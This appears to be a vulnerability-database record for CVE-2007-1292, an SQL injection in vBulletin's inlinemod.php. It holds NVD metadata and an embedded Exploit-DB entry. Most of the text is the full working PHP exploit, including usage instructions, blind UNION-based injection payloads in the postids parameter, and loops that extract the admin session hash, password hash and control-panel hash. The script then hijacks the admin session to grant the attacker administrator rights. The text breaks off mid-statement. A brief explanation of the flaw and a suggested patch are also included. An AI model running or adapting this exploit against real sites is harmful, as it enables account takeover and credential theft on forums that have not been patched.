ID CVE-2007-1292Type cveReporter cve@mitre.orgModified 2017-10-11T01:31:00
Description
SQL injection vulnerability in inlinemod.php in Jelsoft vBulletin before 3.5.8, and before 3.6.5 in the 3.6.x series, might allow remote authenticated users to execute arbitrary SQL commands via the postids parameter. NOTE: the vendor states that the attack is feasible only in circumstances "almost impossible to achieve."
{"id": "CVE-2007-1292", "bulletinFamily": "NVD", "title": "CVE-2007-1292", "description": "SQL injection vulnerability in inlinemod.php in Jelsoft vBulletin before 3.5.8, and before 3.6.5 in the 3.6.x series, might allow remote authenticated users to execute arbitrary SQL commands via the postids parameter. NOTE: the vendor states that the attack is feasible only in circumstances \"almost impossible to achieve.\"", "published": "2007-03-07T00:19:00", "modified": "2017-10-11T01:31:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1292", "reporter": "cve@mitre.org", "references": ["http://www.vbulletin.com/forum/showthread.php?postid=1314422", "https://www.exploit-db.com/exploits/3387", "http://www.securityfocus.com/bid/22780", "http://osvdb.org/33835", "https://exchange.xforce.ibmcloud.com/vulnerabilities/32746", "http://secunia.com/advisories/24341"], "cvelist": ["CVE-2007-1292"], "type": "cve", "lastseen": "2019-05-29T18:08:58", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "03392b18fabe3a72dcee2ea05b6c9d86"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "e1491b6a02e49f3af6d7bfade3df1f96"}, {"key": "cpe23", "hash": "0770d7fbb657090890f89c27f96df89e"}, {"key": "cvelist", "hash": "aba5875b92617bf7a7e46918d9fa883f"}, {"key": "cvss", "hash": "0b053db5674b87efff89989a8a720df3"}, {"key": "cvss2", "hash": "7f7c77d2dde7216a66d00321bd5828f8"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cwe", "hash": "78a7a5cbaf09985c14389298e454e7db"}, {"key": "description", "hash": "c154146b9c3c4c4d7e87f0b2b643d4c4"}, {"key": "href", "hash": "fede4e290069d1cebb5e13a9a79fb7ce"}, {"key": "modified", "hash": "ff318a5b951f747bdf7782c6bc63531b"}, {"key": "published", "hash": "30f37a57b22dcfc882b09930aab94f60"}, {"key": "references", "hash": "b268ea47f8c6a5cc1b3eef45108e0bbf"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "34c9d75a139589c6b04f2041304e9587"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "71a99a3d8cc9921652542bef2cae2142c3287f2c628159699a8d62c605d24547", "viewCount": 1, "enchantments": {"score": {"value": 8.1, "vector": "NONE", "modified": "2019-05-29T18:08:58"}, "dependencies": {"references": [{"type": "osvdb", "idList": ["OSVDB:33835"]}, {"type": "exploitdb", "idList": ["EDB-ID:3387"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7370"]}], "modified": "2019-05-29T18:08:58"}, "vulnersScore": 8.1}, "objectVersion": "1.3", "cpe": ["cpe:/a:jelsoft:vbulletin:3.6.4", "cpe:/a:jelsoft:vbulletin:3.6.3", "cpe:/a:jelsoft:vbulletin:3.6.0", "cpe:/a:jelsoft:vbulletin:3.6.1", "cpe:/a:jelsoft:vbulletin:3.6.2", "cpe:/a:jelsoft:vbulletin:3.6.5"], "affectedSoftware": [{"name": "jelsoft vbulletin", "operator": "eq", "version": "3.6.2"}, {"name": "jelsoft vbulletin", "operator": "eq", "version": "3.6.1"}, {"name": "jelsoft vbulletin", "operator": "eq", "version": "3.6.3"}, {"name": "jelsoft vbulletin", "operator": "eq", "version": "3.6.0"}, {"name": "jelsoft vbulletin", "operator": "eq", "version": "3.6.4"}, {"name": "jelsoft vbulletin", "operator": "le", "version": "3.5.8"}, {"name": "jelsoft vbulletin", "operator": "eq", "version": "3.6.5"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": true, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:jelsoft:vbulletin:3.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:jelsoft:vbulletin:3.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:jelsoft:vbulletin:3.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:jelsoft:vbulletin:3.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:jelsoft:vbulletin:3.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:jelsoft:vbulletin:3.6.3:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-Other"]}
{"exploitdb": [{"lastseen": "2016-01-31T18:22:11", "bulletinFamily": "exploit", "description": "vBulletin <= 3.6.4 (inlinemod.php postids) Remote SQL Injection Exploit. CVE-2007-1292. Webapps exploit for php platform", "modified": "2007-02-28T00:00:00", "published": "2007-02-28T00:00:00", "id": "EDB-ID:3387", "href": "https://www.exploit-db.com/exploits/3387/", "type": "exploitdb", "title": "vBulletin <= 3.6.4 inlinemod.php postids Remote SQL Injection Exploit", "sourceData": "<?php\nprint_r('\n-----------------------------------------------------------------------------\nvBulletin <= 3.6.4 inlinemod.php \"postids\" sql injection / privilege\nescalation by session hijacking exploit\nby rgod\nmail: retrog at alice dot it\nsite: http://retrogod.altervista.org\n\nWorks regardless of php.ini settings, you need a Super Moderator account\nto copy posts among threads, to be launched while admin is logged in to\nthe control panel, this will give you full admin privileges\nnote: this will flood the forum with empty threads even!\n-----------------------------------------------------------------------------\n');\n\nif ($argc<7) {\nprint_r('\n-----------------------------------------------------------------------------\nUsage: php '.$argv[0].' host path user pass forumid postid OPTIONS\nhost: target server (ip/hostname)\npath: path to vbulletin\nuser/pass: you need a moderator account\nforumid: existing forum\npostid: existing post\nOptions:\n -p[port]: specify a port other than 80\n -P[ip:port]: specify a proxy\nExample:\nphp '.$argv[0].' localhost /vbulletin/ rgod mypass 2 121 -P1.1.1.1:80\nphp '.$argv[0].' localhost /vbulletin/ rgod mypass 1 143 -p81\n-----------------------------------------------------------------------------\n');\ndie;\n}\n/*\nvulnerable code in inlinemod.php near lines 185-209:\n\n...\n\tcase 'docopyposts':\n\n\t\t$vbulletin->input->clean_array_gpc('p', array(\n\t\t\t'postids' => TYPE_STR,\n\t\t));\n\n\t\t$postids = explode(',', $vbulletin->GPC['postids']);\n\t\tforeach ($postids AS $index => $postid)\n\t\t{\n\t\t\tif ($postids[\"$index\"] != intval($postid))\n\t\t\t{\n\t\t\t\tunset($postids[\"$index\"]);\n\t\t\t}\n\t\t}\n\n\t\tif (empty($postids))\n\t\t{\n\t\t\teval(standard_error(fetch_error('no_applicable_posts_selected')));\n\t\t}\n\n\t\tif (count($postids) > $postlimit)\n\t\t{\n\t\t\teval(standard_error(fetch_error('you_are_limited_to_working_with_x_posts', $postlimit)));\n\t\t}\n\t\tbreak;\n...\nwhen an element of $postids array is not an integer, it fails to unset() the proper value.\n\nAn example:\n\n<?php\n$foo[1]=\"99999) UNION SELECT foo FROM foo WHERE foo=1 LIMIT 1/*\";\n$foo[2]=intval($foo[1]);\n\necho $foo[1].\"\\n\";\necho $foo[2].\"\\n\";\nif ($foo[1] != $foo[2])\n{\n echo \"they are different\";\n}\nelse\n{\n echo \"they match!\";\n}\n?>\n\noutput:\n\n99999) UNION SELECT foo FROM foo WHERE foo=1 LIMIT 1/*\n99999\nthey match!\n\nthis because when php tries to comparise a string with an integer\nit tries to convert the string in its integer value, it chooses the first integer chars\nof the string itself!\nso unset() never run!\n\nthe result is sql injection near lines 3792-3800:\n\n...\n\t$posts = $db->query_read_slave(\"\n\t\tSELECT post.postid, post.threadid, post.visible, post.title, post.username, post.dateline, post.parentid, post.userid,\n\t\t\tthread.forumid, thread.title AS thread_title, thread.postuserid, thread.visible AS thread_visible, thread.firstpostid,\n\t\t\tthread.sticky, thread.open, thread.iconid\n\t\tFROM \" . TABLE_PREFIX . \"post AS post\n\t\tLEFT JOIN \" . TABLE_PREFIX . \"thread AS thread USING (threadid)\n\t\tWHERE postid IN (\" . implode(',', $postids) . \")\n\t\tORDER BY post.dateline\n\t\");\n...\n\nthis exploit extract various session hashes from the database\nto authenticate as admin and to change the privileges of a registered user\nI could not find a way to see results inside html, so this asks true/false\nquestions to the database, copying posts around threads\n\npossible patch, replace:\nforeach ($postids AS $index => $postid)\n\t\t{\n\t\t \tif ($postids[\"$index\"] != intval($postid))\n\t\t\t{\n\t\t\t unset($postids[\"$index\"]);\n\t\t\t}\n\t\t}\n\nwith:\n\nforeach ($postids AS $index => $postid)\n\t\t{\n\t $postids[\"$index\"]=(int)$postids[\"$index\"];\n\t }\n\n\nand, some line before:\n\nforeach ($threadids AS $index => $threadid)\n\t\t{\n\t\t\tif ($threadids[\"$index\"] != intval($threadid))\n\t\t\t{\n\t\t\t\tunset($threadids[\"$index\"]);\n\t\t\t}\n\t\t}\n\nwith:\n\nforeach ($threadids AS $index => $threadid)\n\t\t{\n\t $threadids[\"$index\"]=(int)$threadids[\"$index\"];\n\t }\n\n\nvendor was contacted by email form...\n*/\n\nerror_reporting(7);\nini_set(\"max_execution_time\",0);\nini_set(\"default_socket_timeout\",5);\n\nfunction quick_dump($string)\n{\n $result='';$exa='';$cont=0;\n for ($i=0; $i<=strlen($string)-1; $i++)\n {\n if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))\n {$result.=\" .\";}\n else\n {$result.=\" \".$string[$i];}\n if (strlen(dechex(ord($string[$i])))==2)\n {$exa.=\" \".dechex(ord($string[$i]));}\n else\n {$exa.=\" 0\".dechex(ord($string[$i]));}\n $cont++;if ($cont==15) {$cont=0; $result.=\"\\r\\n\"; $exa.=\"\\r\\n\";}\n }\n return $exa.\"\\r\\n\".$result;\n}\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\nfunction sendpacketii($packet)\n{\n global $proxy, $host, $port, $html, $proxy_regex;\n if ($proxy=='') {\n $ock=fsockopen(gethostbyname($host),$port);\n if (!$ock) {\n echo 'No response from '.$host.':'.$port; die;\n }\n }\n else {\n\t$c = preg_match($proxy_regex,$proxy);\n if (!$c) {\n echo 'Not a valid proxy...';die;\n }\n $parts=explode(':',$proxy);\n echo \"Connecting to \".$parts[0].\":\".$parts[1].\" proxy...\\r\\n\";\n $ock=fsockopen($parts[0],$parts[1]);\n if (!$ock) {\n echo 'No response from proxy...';die;\n\t}\n }\n fputs($ock,$packet);\n if ($proxy=='') {\n $html='';\n while (!feof($ock)) {\n $html.=fgets($ock);\n }\n }\n else {\n $html='';\n while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {\n $html.=fread($ock,1);\n }\n }\n fclose($ock);\n}\n\n$host=$argv[1];\n$path=$argv[2];\n$user=$argv[3];\n$pass=md5($argv[4]);\n$forumid=(int)$argv[5];\n$existing_post=(int)$argv[6];\n\n$port=80;\n$proxy=\"\";\nfor ($i=3; $i<$argc; $i++){\n$temp=$argv[$i][0].$argv[$i][1];\nif (($temp<>\"-p\") and ($temp<>\"-P\")) {$cmd.=\" \".$argv[$i];}\nif ($temp==\"-p\")\n{\n $port=str_replace(\"-p\",\"\",$argv[$i]);\n}\nif ($temp==\"-P\")\n{\n $proxy=str_replace(\"-P\",\"\",$argv[$i]);\n}\n}\nif (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}\nif ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}\n\n$data=\"vb_login_username=$user\";\n$data.=\"&vb_login_password=\";\n$data.=\"&s=\";\n$data.=\"&do=login\";\n$data.=\"&vb_login_md5password=$pass\";\n$data.=\"&vb_login_md5password_utf=$pass\";\n$packet=\"POST \".$p.\"login.php HTTP/1.0\\r\\n\";\n$packet.=\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\\r\\n\";\n$packet.=\"Referer: http://\".$host.$path.\"login.php\\r\\n\";\n$packet.=\"Accept-Language: en\\r\\n\";\n$packet.=\"Content-Type: application/x-www-form-urlencoded\\r\\n\";\n$packet.=\"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\\r\\n\";\n$packet.=\"Host: \".$host.\"\\r\\n\";\n$packet.=\"Content-Length: \".strlen($data).\"\\r\\n\";\n$packet.=\"Pragma: no-cache\\r\\n\";\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\n$packet.=$data;\nsendpacketii($packet);\n$cookie=\"\";\n$temp=explode(\"Set-Cookie: \",$html);\nfor ($i=1; $i<count($temp); $i++)\n{\n $temp2=explode(\" \",$temp[$i]);\n $cookie.=\" \".trim($temp2[0]);\n}\n//echo \"your cookie -> \".$cookie.\"\\n\\n\";\nif (!eregi(\"sessionhash\",$cookie)){die(\"failed to login...\");}$temp=str_replace(\" \",\"\",$cookie);$temp=str_replace(\"sessionhash\",\"\",$temp);\n$temp=str_replace(\"lastvisit\",\"\",$temp);$temp=str_replace(\"lastactivity\",\"\",$temp);$temp=explode(\"=\",$temp);$temp=explode(\";\",$temp[1]);\n$cookie_prefix=trim($temp[1]);echo \"cookie prefix -> \".$cookie_prefix.\"\\n\";\n\n$chars[0]=0;//null\n$chars=array_merge($chars,range(48,57)); //numbers\n\n$j=1;$uid=\"\";\necho \"admim user id -> \";\nwhile (!strstr($uid,chr(0)))\n{\n for ($i=0; $i<=255; $i++)\n {\n if (in_array($i,$chars))\n {\n $data =\"s=\";\n $data.=\"&do=docopyposts\";\n $data.=\"&destforumid=$forumid\";\n $data.=\"&title=suntzu\";\n $data.=\"&forumid=$forumid\";\n $data.=\"&postids=9999999)/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(userid,\".$j.\",1))=\".$i.\"),$existing_post,-999999)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/user/**/WHERE/**/usergroupid=6/**/LIMIT/**/1/*\";\n $packet =\"POST \".$p.\"inlinemod.php?f=$forumid HTTP/1.0\\r\\n\";\n $packet.=\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\\r\\n\";\n $packet.=\"Referer: http://\".$host.$path.\"profile.php\\r\\n\";\n $packet.=\"Accept-Language: it\\r\\n\";\n $packet.=\"Content-Type: application/x-www-form-urlencoded\\r\\n\";\n $packet.=\"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\\r\\n\";\n $packet.=\"Host: \".$host.\"\\r\\n\";\n $packet.=\"Content-Length: \".strlen($data).\"\\r\\n\";\n $packet.=\"Pragma: no-cache\\r\\n\";\n $packet.=\"Cookie: \".$cookie.\"; \\r\\n\";\n $packet.=\"Connection: Close\\r\\n\\r\\n\";\n $packet.=$data;\n sendpacketii($packet);\n $temp=explode(\"showthread.php?t=\",$html);\n $temp2=explode(\"\\n\",$temp[1]);\n $thread=(int)$temp2[0];\n\n $packet =\"GET \".$p.\"showthread.php?t=$thread HTTP/1.0\\r\\n\";\n $packet.=\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\\r\\n\";\n $packet.=\"Referer: http://\".$host.$path.\"profile.php\\r\\n\";\n $packet.=\"Accept-Language: it\\r\\n\";\n $packet.=\"Content-Type: application/x-www-form-urlencoded\\r\\n\";\n $packet.=\"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\\r\\n\";\n $packet.=\"Host: \".$host.\"\\r\\n\";\n $packet.=\"Pragma: no-cache\\r\\n\";\n $packet.=\"Cookie: \".$cookie.\"; \\r\\n\";\n $packet.=\"Connection: Close\\r\\n\\r\\n\";\n sendpacketii($packet);\n if (eregi(\"You have an error in your SQL syntax\",$html)){echo $html; die(\"\\nunknown query error...\");}\n if (eregi(\"join date\",$html)) {$uid.=chr($i);echo chr($i); sleep(1); break;}\n }\n if ($i==255) {\n die(\"\\nExploit failed...\");\n }\n }\n$j++;\n}\nif (trim($uid)==\"\"){die(\"\\nExploit failed...\");}else{echo \"\\nvulnerable!\";}\n$uid=intval($uid);\n\nfunction my_encode($my_string)\n{\n $encoded=\"CHAR(\";\n for ($k=0; $k<=strlen($my_string)-1; $k++)\n {\n $encoded.=ord($my_string[$k]);\n if ($k==strlen($my_string)-1) {$encoded.=\")\";}\n else {$encoded.=\",\";}\n }\n return $encoded;\n}\n\n\n$j=1;$my_uid=\"\";\necho \"\\nyour user id -> \";\nwhile (!strstr($my_uid,chr(0)))\n{\n for ($i=0; $i<=255; $i++)\n {\n if (in_array($i,$chars))\n {\n $data =\"s=\";\n $data.=\"&do=docopyposts\";\n $data.=\"&destforumid=$forumid\";\n $data.=\"&title=suntzu\";\n $data.=\"&forumid=$forumid\";\n $data.=\"&postids=9999999)/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(userid,\".$j.\",1))=\".$i.\"),$existing_post,-999999)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/user/**/WHERE/**/username=\".my_encode($user).\"/**/LIMIT/**/1/*\";\n $packet =\"POST \".$p.\"inlinemod.php?f=$forumid HTTP/1.0\\r\\n\";\n $packet.=\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\\r\\n\";\n $packet.=\"Referer: http://\".$host.$path.\"profile.php\\r\\n\";\n $packet.=\"Accept-Language: it\\r\\n\";\n $packet.=\"Content-Type: application/x-www-form-urlencoded\\r\\n\";\n $packet.=\"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\\r\\n\";\n $packet.=\"Host: \".$host.\"\\r\\n\";\n $packet.=\"Content-Length: \".strlen($data).\"\\r\\n\";\n $packet.=\"Pragma: no-cache\\r\\n\";\n $packet.=\"Cookie: \".$cookie.\"; \\r\\n\";\n $packet.=\"Connection: Close\\r\\n\\r\\n\";\n $packet.=$data;\n sendpacketii($packet);\n if (eregi(\"You have an error in your SQL syntax\",$html)){echo $html; die(\"\\nunknown query error...\");}\n $temp=explode(\"showthread.php?t=\",$html);\n $temp2=explode(\"\\n\",$temp[1]);\n $thread=(int)$temp2[0];\n\n $packet =\"GET \".$p.\"showthread.php?t=$thread HTTP/1.0\\r\\n\";\n $packet.=\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\\r\\n\";\n $packet.=\"Referer: http://\".$host.$path.\"profile.php\\r\\n\";\n $packet.=\"Accept-Language: it\\r\\n\";\n $packet.=\"Content-Type: application/x-www-form-urlencoded\\r\\n\";\n $packet.=\"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\\r\\n\";\n $packet.=\"Host: \".$host.\"\\r\\n\";\n $packet.=\"Pragma: no-cache\\r\\n\";\n $packet.=\"Cookie: \".$cookie.\"; \\r\\n\";\n $packet.=\"Connection: Close\\r\\n\\r\\n\";\n sendpacketii($packet);\n if (eregi(\"join date\",$html)) {$my_uid.=chr($i);echo chr($i); sleep(1); break;}\n }\n if ($i==255) {\n die(\"\\nExploit failed...\");\n }\n }\n$j++;\n}\n$my_uid=intval($my_uid);\n\n$chars[0]=0;//null\n$chars=array_merge($chars,range(48,57)); //numbers\n$chars=array_merge($chars,range(97,102));//a-f letters\n$j=1;$sess_hash=\"\";\necho \"\\nsession hash -> \";\nwhile (!strstr($sess_hash,chr(0)))\n{\n for ($i=0; $i<=255; $i++)\n {\n if (in_array($i,$chars))\n {\n $data =\"s=\";\n $data.=\"&do=docopyposts\";\n $data.=\"&destforumid=$forumid\";\n $data.=\"&title=suntzu\";\n $data.=\"&forumid=$forumid\";\n $data.=\"&postids=9999999)/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(sessionhash,\".$j.\",1))=\".$i.\"),$existing_post,-999999)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/session/**/WHERE/**/userid=$uid/**/LIMIT/**/1/*\";\n $packet =\"POST \".$p.\"inlinemod.php?f=$forumid HTTP/1.0\\r\\n\";\n $packet.=\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\\r\\n\";\n $packet.=\"Referer: http://\".$host.$path.\"profile.php\\r\\n\";\n $packet.=\"Accept-Language: it\\r\\n\";\n $packet.=\"Content-Type: application/x-www-form-urlencoded\\r\\n\";\n $packet.=\"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\\r\\n\";\n $packet.=\"Host: \".$host.\"\\r\\n\";\n $packet.=\"Content-Length: \".strlen($data).\"\\r\\n\";\n $packet.=\"Pragma: no-cache\\r\\n\";\n $packet.=\"Cookie: \".$cookie.\"; \\r\\n\";\n $packet.=\"Connection: Close\\r\\n\\r\\n\";\n $packet.=$data;\n sendpacketii($packet);\n if (eregi(\"You have an error in your SQL syntax\",$html)){echo $html; die(\"\\nunknown query error...\");}\n $temp=explode(\"showthread.php?t=\",$html);\n $temp2=explode(\"\\n\",$temp[1]);\n $thread=(int)$temp2[0];\n\n $packet =\"GET \".$p.\"showthread.php?t=$thread HTTP/1.0\\r\\n\";\n $packet.=\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\\r\\n\";\n $packet.=\"Referer: http://\".$host.$path.\"profile.php\\r\\n\";\n $packet.=\"Accept-Language: it\\r\\n\";\n $packet.=\"Content-Type: application/x-www-form-urlencoded\\r\\n\";\n $packet.=\"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\\r\\n\";\n $packet.=\"Host: \".$host.\"\\r\\n\";\n $packet.=\"Pragma: no-cache\\r\\n\";\n $packet.=\"Cookie: \".$cookie.\"; \\r\\n\";\n $packet.=\"Connection: Close\\r\\n\\r\\n\";\n sendpacketii($packet);\n if (eregi(\"join date\",$html)) {$sess_hash.=chr($i);echo chr($i); sleep(1); break;}\n }\n if ($i==255) {\n die(\"\\nExploit failed...\");\n }\n }\n$j++;\n}\n\n$j=1;$my_hash=\"\";\necho \"\\nuser password hash -> \";\nwhile (!strstr($my_hash,chr(0)))\n{\n for ($i=0; $i<=255; $i++)\n {\n if (in_array($i,$chars))\n {\n $data =\"s=\";\n $data.=\"&do=docopyposts\";\n $data.=\"&destforumid=$forumid\";\n $data.=\"&title=suntzu\";\n $data.=\"&forumid=$forumid\";\n $data.=\"&postids=9999999)/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(password,\".$j.\",1))=\".$i.\"),$existing_post,-999999)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/user/**/WHERE/**/userid=$uid/**/LIMIT/**/1/*\";\n $packet =\"POST \".$p.\"inlinemod.php?f=$forumid HTTP/1.0\\r\\n\";\n $packet.=\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\\r\\n\";\n $packet.=\"Referer: http://\".$host.$path.\"profile.php\\r\\n\";\n $packet.=\"Accept-Language: en\\r\\n\";\n $packet.=\"Content-Type: application/x-www-form-urlencoded\\r\\n\";\n $packet.=\"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\\r\\n\";\n $packet.=\"Host: \".$host.\"\\r\\n\";\n $packet.=\"Content-Length: \".strlen($data).\"\\r\\n\";\n $packet.=\"Pragma: no-cache\\r\\n\";\n $packet.=\"Cookie: \".$cookie.\"; \\r\\n\";\n $packet.=\"Connection: Close\\r\\n\\r\\n\";\n $packet.=$data;\n sendpacketii($packet);\n if (eregi(\"You have an error in your SQL syntax\",$html)){echo $html; die(\"\\nunknown query error...\");}\n $temp=explode(\"showthread.php?t=\",$html);\n $temp2=explode(\"\\n\",$temp[1]);\n $thread=(int)$temp2[0];\n\n\t\t $packet =\"GET \".$p.\"showthread.php?t=$thread HTTP/1.0\\r\\n\";\n $packet.=\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\\r\\n\";\n $packet.=\"Referer: http://\".$host.$path.\"profile.php\\r\\n\";\n $packet.=\"Accept-Language: en\\r\\n\";\n $packet.=\"Content-Type: application/x-www-form-urlencoded\\r\\n\";\n $packet.=\"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\\r\\n\";\n $packet.=\"Host: \".$host.\"\\r\\n\";\n $packet.=\"Pragma: no-cache\\r\\n\";\n $packet.=\"Cookie: \".$cookie.\"; \\r\\n\";\n $packet.=\"Connection: Close\\r\\n\\r\\n\";\n sendpacketii($packet);\n if (eregi(\"join date\",$html)) {$my_hash.=chr($i);echo chr($i); sleep(1); break;}\n }\n if ($i==255) {\n die(\"\\nExploit failed...\");\n }\n }\n$j++;\n}\n\n$j=1;$cpsess_hash=\"\";\necho \"\\ncp session hash -> \";\nwhile (!strstr($cpsess_hash,chr(0)))\n{\n for ($i=0; $i<=255; $i++)\n {\n if (in_array($i,$chars))\n {\n $data =\"s=\";\n $data.=\"&do=docopyposts\";\n $data.=\"&destforumid=$forumid\";\n $data.=\"&title=suntzu\";\n $data.=\"&forumid=$forumid\";\n $data.=\"&postids=9999999)/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(hash,\".$j.\",1))=\".$i.\"),$existing_post,-999999)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/cpsession/**/WHERE/**/userid=$uid/**/LIMIT/**/1/*\";\n $packet =\"POST \".$p.\"inlinemod.php?f=$forumid HTTP/1.0\\r\\n\";\n $packet.=\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\\r\\n\";\n $packet.=\"Referer: http://\".$host.$path.\"profile.php\\r\\n\";\n $packet.=\"Accept-Language: en\\r\\n\";\n $packet.=\"Content-Type: application/x-www-form-urlencoded\\r\\n\";\n $packet.=\"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\\r\\n\";\n $packet.=\"Host: \".$host.\"\\r\\n\";\n $packet.=\"Content-Length: \".strlen($data).\"\\r\\n\";\n $packet.=\"Pragma: no-cache\\r\\n\";\n $packet.=\"Cookie: \".$cookie.\"; \\r\\n\";\n $packet.=\"Connection: Close\\r\\n\\r\\n\";\n $packet.=$data;\n sendpacketii($packet);\n $temp=explode(\"showthread.php?t=\",$html);\n $temp2=explode(\"\\n\",$temp[1]);\n $thread=(int)$temp2[0];\n\n $packet =\"GET \".$p.\"showthread.php?t=$thread HTTP/1.0\\r\\n\";\n $packet.=\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\\r\\n\";\n $packet.=\"Referer: http://\".$host.$path.\"profile.php\\r\\n\";\n $packet.=\"Accept-Language: en\\r\\n\";\n $packet.=\"Content-Type: application/x-www-form-urlencoded\\r\\n\";\n $packet.=\"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\\r\\n\";\n $packet.=\"Host: \".$host.\"\\r\\n\";\n $packet.=\"Pragma: no-cache\\r\\n\";\n $packet.=\"Cookie: \".$cookie.\"; \\r\\n\";\n $packet.=\"Connection: Close\\r\\n\\r\\n\";\n sendpacketii($packet);\n if (eregi(\"You have an error in your SQL syntax\",$html)){echo $html; die(\"\\nunknown query error...\");}\n if (eregi(\"join date\",$html)) {$cpsess_hash.=chr($i);echo chr($i); sleep(1); break;}\n }\n if ($i==255) {\n die(\"\\nExploit failed...\");\n }\n }\n$j++;\n}\necho \"\\n\";\n\n$packet =\"GET \".$p.\"admincp/user.php?do=edit&u=$my_uid HTTP/1.0\\r\\n\";\n$packet.=\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\\r\\n\";\n$packet.=\"Referer: http://\".$host.$path.\"profile.php\\r\\n\";\n$packet.=\"Accept-Language: en\\r\\n\";\n$packet.=\"Content-Type: application/x-www-form-urlencoded\\r\\n\";\n$packet.=\"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\\r\\n\";\n$packet.=\"Host: \".$host.\"\\r\\n\";\n$packet.=\"Pragma: no-cache\\r\\n\";\n$packet.=\"Cookie: \".$cookie_prefix.\"lastactivity=0; \".$cookie_prefix.\"password=\".md5(trim($my_hash)).\"; bbuserid=\".$uid.\"; \".$cookie_prefix.\"sessionhash=\".trim($sess_hash).\"; \".$cookie_prefix.\"cpsession=\".trim($cpsess_hash).\";\\r\\n\";\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\nsendpacketii($packet);\n$temp=explode(\"adminhash\\\" value=\\\"\",$html);\n$temp2=explode(\"\\\"\",$temp[1]);\n$adminhash=$temp2[0];\necho \"adminhash ->\".$adminhash.\"\\n\";\nif ($adminhash<>\"\") {echo \"\\ndone! you are in... updating \".$user.\" rights\";}\nelse {die(\"\\nexploit failed...\");}\n\n//join to the Administrator group\n$my_email=\"suntzu@suntzu.com\";\n$data 